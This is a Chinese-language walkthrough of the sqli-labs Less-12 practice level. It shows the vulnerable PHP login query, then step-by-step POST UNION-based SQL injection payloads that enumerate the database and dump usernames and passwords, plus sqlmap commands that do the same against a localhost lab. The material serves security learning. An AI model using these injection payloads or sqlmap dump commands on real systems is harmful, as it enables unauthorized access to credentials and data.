sqli-labs：Less-12关卡详细解析

1. 思路🚀

本关的SQL语句为：

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

注入类型：字符串型（双引号、括号包裹）、POST请求
提示：参数需以")闭合

php输出语句的部分代码：

if($row)
{//echo '<font color= "#0000ff">';	echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in\n\n " ;echo '<font size="3" color="#0000ff">';	echo "<br>";echo 'Your Login name:'. $row['username'];echo "<br>";echo 'Your Password:' .$row['password'];echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg"  />';	echo "</font>";
}

从源码下手便于我们更清晰的锁定回显情况，从而更深入的理解知识点，每篇文章我都会附加上重点代码部分。
在这里插入图片描述

2. 手工注入步骤🎯

我的地址栏是：http://localhost:8081/Less-12/，只需要将下面的url和post data放入对应位置，粘贴即可。

2.1. 判断能否注入⚡

uname=1") order by 3 #
&passwd=admin&submit=Submit

order by 3：探测字段数（报错说明字段数=2）

在这里插入图片描述

2.2. 判断回显点⚡

uname=1") union select 1,2 #
&passwd=admin&submit=Submit

在这里插入图片描述

2.3. 获取基础信息⚡

uname=1") union select database(),user() #
&passwd=admin&submit=Submit

在这里插入图片描述

2.4. 获取表名⚡

uname=1") union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'security' #
&passwd=admin&submit=Submit

在这里插入图片描述

2.5. 获取字段⚡

uname=1") union select 1,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' #
&passwd=admin&submit=Submit

在这里插入图片描述

2.6. 获取数据⚡

uname=1") union select group_concat(username),group_concat(password) from users #
&passwd=admin&submit=Submit

在这里插入图片描述

2.7. 参数汇总表⭐

参数	作用	示例
`")`	闭合符号	`id=1')`
`#`	注释符	`#`
`order by`	判断字段数	`order by 3`
`union select`	联合查询	`union select 1,2,3`
`group_concat()`	合并结果	`group_concat(table_name)`
`information_schema`	系统数据库	`from information_schema.tables`
`table_schema`	数据库名称	`table_schema='security'`
`table_name`	数据表名称	`table_name='users'`
`column_name`	字段名称	`group_concat(column_name)`

3. SQLMap工具测试🎯

url地址换成自己的，比如：http://localhost:8081/Less-12/，由于本关卡为post请求，需要加参数指明请求格式，
--data="uname=1&passwd=123456"，uname与passwd的值随意，具体如下：⭐

# 检测注入点
python sqlmap.py -u "http://localhost:8081/Less-12/" --data="uname=1&passwd=123456" --batch# 爆数据库
python sqlmap.py -u "url" --data="uname=1&passwd=123456" --dbs --batch# 爆表名
python sqlmap.py -u "url" --data="uname=1&passwd=123456" -D security --tables --batch# 爆列名
python sqlmap.py -u "url" --data="uname=1&passwd=123456" -D security -T users --columns --batch# 爆数据
python sqlmap.py -u "url" --data="uname=1&passwd=123456" -D security -T users -C id,username,password --dump --batch

命令1截图：
在这里插入图片描述

命令5截图：
在这里插入图片描述

SQLMap参数表⭐

参数	功能
`--data`	指定`post`请求
`--batch`	非交互模式
`--dbs`	枚举数据库
`-D`	指定数据库
`-T`	指定表
`-C`	指定列
`--dump`	导出数据

4. 总结🏁

本关卡与关卡11的解法一致，但关卡11的解析更为详细，欢迎大家移步"sqli-labs：Less-11关卡详细解析"
https://blog.csdn.net/qq_62000508/article/details/149805916?spm=1011.2124.3001.6209

声明：本文仅用于安全学习，严禁非法测试！ ❗❗❗

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。
如若转载，请注明出处：http://www.pswp.cn/pingmian/91749.shtml
繁体地址，请注明出处：http://hk.pswp.cn/pingmian/91749.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！